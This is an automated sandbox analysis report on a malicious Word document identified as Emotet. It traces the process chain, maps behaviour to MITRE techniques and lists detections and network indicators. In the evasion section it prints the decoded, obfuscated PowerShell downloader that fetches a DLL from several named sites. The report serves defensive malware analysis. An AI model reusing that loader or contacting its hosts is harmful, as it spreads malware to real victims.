                      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [encoded command removed]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLL
                      Source: C:\Windows\System32\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqryhcbuipyk\timgojzfiiv.pkf',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Smbjrydierlk\vhfvfjykmpc.gpr',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zighjhitzytphbn\uglqlahctjehdp.dot',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kviedw\vklxa.red',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jwivvemqsvj\ytoymdqmxu.lfx',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xjfxyzhrduzjhpv\whfytnwxpdgksj.gxy',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvmidjdy\junkzqh.mrj',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Keqofngu\zdyvzfg.cjv',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ngtbqtsge\bgcbpmtq.wzo',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Loyvqvaohpqmmxv\wleeyowrrvrssq.giw',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rqvte\amll.nuu',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpjmjgasqrjuply\qjwbjnwqtblulz.cqq',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: Window Recorder, Window detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: E:\WindowsSDK7-Samples-master\WindowsSDK7-Samples-master\winui\shell\appshellintegration\RecipePropertyHandler\Win32\Release\RecipePropertyHandler.pdb source: rundll32.exe, 00000007.00000002.2097438801.000000001000D000.00000002.00020000.sdmp
                      Source: Binary string: ws\System.pdbpdbtem.pdb\B source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\System.pdbE source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: ws\dll\System.pdb source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: <ystem.pdbD source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.pdblogwW source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbrac source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2095066862.0000000002C37000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2094801534.0000000002780000.00000002.00000001.sdmp
                      Source: Bestand.doc, Initial sample: OLE summary subject = didactic Intelligent system Incredible Wooden Sausages Developer Practical Plastic Cheese port Awesome Fresh Chicken Maine

                      Data Obfuscation:

                      Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
                      Source: Bestand.doc, Stream path 'Macros/VBA/A81c_pcot0t3c8' : High number of GOTO operations
                      Source: VBA code instrumentation, OLE, VBA macro, High number of GOTO operations: Module A81c_pcot0t3c8, Name: A81c_pcot0t3c8
                      Obfuscated command line found
                      Source: unknown, Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD [encoded command removed]
                      PowerShell case anomaly found
                      Source: unknown, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [encoded command removed]
                      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [encoded command removed]
                      Suspicious powershell command line found
                      Source: unknown, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [encoded command removed]
                      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [encoded command removed]
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_1000C620
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_10008085 push ecx; ret 7_2_10008098
                      Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 7_2_10004ADA push ecx; ret 7_2_10004AED

                      Persistence and Installation Behavior:

                      Creates processes via WMI
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

                      Hooking and other Techniques for Hiding and Protection:

                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Windows\SysWOW64\Pqryhcbuipyk\timgojzfiiv.pkf:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Windows\SysWOW64\Smbjrydierlk\vhfvfjykmpc.gpr:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Windows\SysWOW64\Zighjhitzytphbn\uglqlahctjehdp.dot:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Windows\SysWOW64\Kviedw\vklxa.red:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Windows\SysWOW64\Jwivvemqsvj\ytoymdqmxu.lfx:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Windows\SysWOW64\Xjfxyzhrduzjhpv\whfytnwxpdgksj.gxy:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Windows\SysWOW64\Yvmidjdy\junkzqh.mrj:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Windows\SysWOW64\Keqofngu\zdyvzfg.cjv:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Windows\SysWOW64\Ngtbqtsge\bgcbpmtq.wzo:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Windows\SysWOW64\Loyvqvaohpqmmxv\wleeyowrrvrssq.giw:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Windows\SysWOW64\Rqvte\amll.nuu:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Windows\SysWOW64\Gpjmjgasqrjuply\qjwbjnwqtblulz.cqq:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2400 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_006F109C FindFirstFileW,19_2_006F109C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000005.00000002.2092843138.0000000000374000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_100011C0 Control_RunDLL,VirtualAlloc,VirtualAlloc,GetModuleHandleExA,VirtualAlloc,GetProcAddress,GetProcAddress,VirtualAlloc,GetProcAddress,LdrFindResource_U,LdrAccessResource,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,VirtualAlloc,_memmove,CryptEncrypt,7_2_100011C0
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_1000C620
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_006CC4FF mov eax, dword ptr fs:[00000030h] 7_2_006CC4FF
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0022C4FF mov eax, dword ptr fs:[00000030h] 8_2_0022C4FF
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_007AC4FF mov eax, dword ptr fs:[00000030h] 9_2_007AC4FF
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0025C4FF mov eax, dword ptr fs:[00000030h] 10_2_0025C4FF
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002DC4FF mov eax, dword ptr fs:[00000030h] 11_2_002DC4FF
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_002CC4FF mov eax, dword ptr fs:[00000030h] 12_2_002CC4FF
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022C4FF mov eax, dword ptr fs:[00000030h] 13_2_0022C4FF
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0021C4FF mov eax, dword ptr fs:[00000030h] 14_2_0021C4FF
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0021C4FF mov eax, dword ptr fs:[00000030h] 15_2_0021C4FF
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_001DC4FF mov eax, dword ptr fs:[00000030h] 16_2_001DC4FF
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_0021C4FF mov eax, dword ptr fs:[00000030h] 17_2_0021C4FF
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 18_2_0021C4FF mov eax, dword ptr fs:[00000030h] 18_2_0021C4FF
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 19_2_006FC4FF mov eax, dword ptr fs:[00000030h] 19_2_006FC4FF
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10001B30 SetLastError,SetLastError,VirtualAlloc,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,7_2_10001B30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007F07 SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_10007F07

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 5.2.136.90 80
                      Encrypted powershell cmdline option found
                      Source: unknownProcess created: Base64 decoded seT-ItEM vaRiABLE:09P ([TyPE]("{0}{3}{2}{1}"-F 'Sy','ctOrY','.io.DIrE','steM')) ; seT-itEM ('V'+'Ar'+'iAbLE:av5'+'L'+'oR') ([tYpe]("{0}{7}{1}{3}{4}{6}{5}{2}"-f 'SyS','em.NeT.Serv','er','I','cepo','tManag','In','T') ) ; $ErrorActionPreference = (('S'+'ilen')+('tlyC'+'ont')+'i'+('n'+'ue'));$D81vl6l=$P12R + [char](64) + $O98E;$R_1Z=('K2'+'6E'); (Gci vArIABLe:09p ).VALue::"CREa`Te`DIr`e`CTOry"($HOME + (('B'+('G'+'FLq'+'pw_5iB'+'G')+('FF4w0'+'o')+'sc'+('BG'+'F')) -CRepLAcE('BG'+'F'),[cHar]92));$C69V=('U9'+'4V'); ( VAriablE ("Av5"+"Lo"+"r") -vAluEon )::"s`EcURi`Typ`ROt`Ocol" = (('Tl'+'s')+'12');$N80V=('F8'+'8Y');$Rgb0fqp = (('R9'+'5')+'F');$H23I=('V'+('0'+'4P'));$Gqlw9td=$HOME+(('{0}Lq'+'pw_5i{0}'+'F'+'4w'+'0osc{0}')-f [Char]92)+$Rgb0fqp+('.'+('d'+'ll'));$D34S=('V5'+'9T');$Lz7468s=((']a'+'n')+('w[3'+':')+'//'+('hang'+'a')+('rla'+'s')+('tik.'+'c')+('o'+'m/'+'cgi')+('-bi'+'n/'+'Ui4')+('n'+'/@')+']a'+('nw[3'+':'+'//')+('p'+'adr'+'eesc'+'ap'+'es'+'.com/b'+'l')+('og/0'+'I/@')+(']'+'an')+'w['+('3:'+'//s')+'a'+'r'+'t'+'ur'+'e.'+('c'+'om/wp')+('-inc'+'l'+'u')+('des'+'/JD8'+'/@]')+('an'+'w')+('[3:'+'/')+'/s'+'e'+('o'+'.ud')+('aip'+'urkar'+'t.c')+'o'+('m/rx-'+'5'+'700')+'-6'+('hnr7/S'+'gms'+'/@')+(']anw'+'[3'+':/')+'/p'+'hu'+('on'+'g')+'ap'+('p'+'le')+('.c'+'om/'+'mess')+'e'+'ng'+('e'+'r-')+'so'+('un'+'d')+'-8'+'kw'+'kq'+'/Y'+('Fr7/@'+']anw'+'[')+('3s://'+'b')+('r'+'et')+'ts'+'ha'+('wmagic'+'.com'+'/co')+('nte'+'nt')+('/Y/'+'@]an')+('w'+'[3s://c'+'a'+'fecen'+'tral.vi')+('
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [...]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLL
                      Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pqryhcbuipyk\timgojzfiiv.pkf',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Smbjrydierlk\vhfvfjykmpc.gpr',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zighjhitzytphbn\uglqlahctjehdp.dot',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kviedw\vklxa.red',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Jwivvemqsvj\ytoymdqmxu.lfx',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Xjfxyzhrduzjhpv\whfytnwxpdgksj.gxy',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yvmidjdy\junkzqh.mrj',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Keqofngu\zdyvzfg.cjv',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ngtbqtsge\bgcbpmtq.wzo',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Loyvqvaohpqmmxv\wleeyowrrvrssq.giw',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rqvte\amll.nuu',Control_RunDLL
                      Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpjmjgasqrjuply\qjwbjnwqtblulz.cqq',Control_RunDLL
                      Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD [...]
                      Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD [...]
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004C5A cpuid
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10007D46 GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,QueryPerformanceCounter
                      Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      Yara detected Emotet

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation 11 | Path Interception | Process Injection 111 | Disable or Modify Tools 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Scripting 32 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Deobfuscate/Decode Files or Information 3 | LSASS Memory | File and Directory Discovery 3 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | Native API 1 | Logon Script (Windows) | Logon Script (Windows) | Scripting 32 | Security Account Manager | System Information Discovery 26 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | Exploitation for Client Execution 3 | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | Security Software Discovery 31 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Command and Scripting Interpreter 211 | Network Logon Script | Network Logon Script | Masquerading 11 | LSA Secrets | Virtualization/Sandbox Evasion 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | PowerShell 3 | Rc.common | Rc.common | Virtualization/Sandbox Evasion 2 | Cached Domain Credentials | Process Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 111 | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Hidden Files and Directories 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Rundll32 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                      Behavior Graph

                      [Behavior graph image not reproduced. Behavior Graph ID: 337085; Sample: Bestand.doc; Startdate: 07/01/2021; Architecture: WINDOWS; Score: 100. Processes shown: cmd.exe and WINWORD.EXE started; cmd.exe started powershell.exe and msg.exe; powershell.exe contacted seo.udaipurkart.com (103.92.235.25, port 80), hangarlastik.com (89.252.164.58, port 80) and 2 other IPs or domains, then started rundll32.exe, which started a chain of further rundll32.exe processes. Signatures on cmd.exe: Suspicious powershell command line found; Very long command line found; Encrypted powershell cmdline option found; PowerShell case anomaly found. Signature on the rundll32.exe chain: Hides that the sample has been downloaded from the Internet (zone.identifier).]


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      Bestand.doc | 61% | Virustotal |

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      12.2.rundll32.exe.2c0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      16.2.rundll32.exe.1d0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      10.2.rundll32.exe.250000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      19.2.rundll32.exe.6f0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      17.2.rundll32.exe.210000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      13.2.rundll32.exe.220000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      18.2.rundll32.exe.210000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      8.2.rundll32.exe.220000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      7.2.rundll32.exe.6c0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      15.2.rundll32.exe.210000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      11.2.rundll32.exe.2d0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      9.2.rundll32.exe.7a0000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                      14.2.rundll32.exe.210000.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                      Domains

                      Source | Detection | Scanner | Label
                      sarture.com | 2% | Virustotal |
                      hangarlastik.com | 6% | Virustotal |
                      seo.udaipurkart.com | 6% | Virustotal |
                      padreescapes.com | 1% | Virustotal |

                      URLs

                      Source | Detection | Scanner | Label
                      http://hangarlastik.com/cgi-sys/suspendedpage.cgi | 2% | Virustotal |
                      http://hangarlastik.com/cgi-sys/suspendedpage.cgi | 0% | Avira URL Cloud | safe
                      http://padreescapes.com | 1% | Virustotal |
                      http://padreescapes.com | 0% | Avira URL Cloud | safe
                      http://5.2.136.90/1b05ye92bd1jr3/zyv623ztls/15s4sj3gl56q/ | 0% | Avira URL Cloud | safe
                      http://hangarlastik.comp | 0% | Avira URL Cloud | safe
                      http://hangarlastik.com | 0% | Avira URL Cloud | safe
                      https://brettshawmagic.com/content/Y/ | 100% | Avira URL Cloud | malware
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
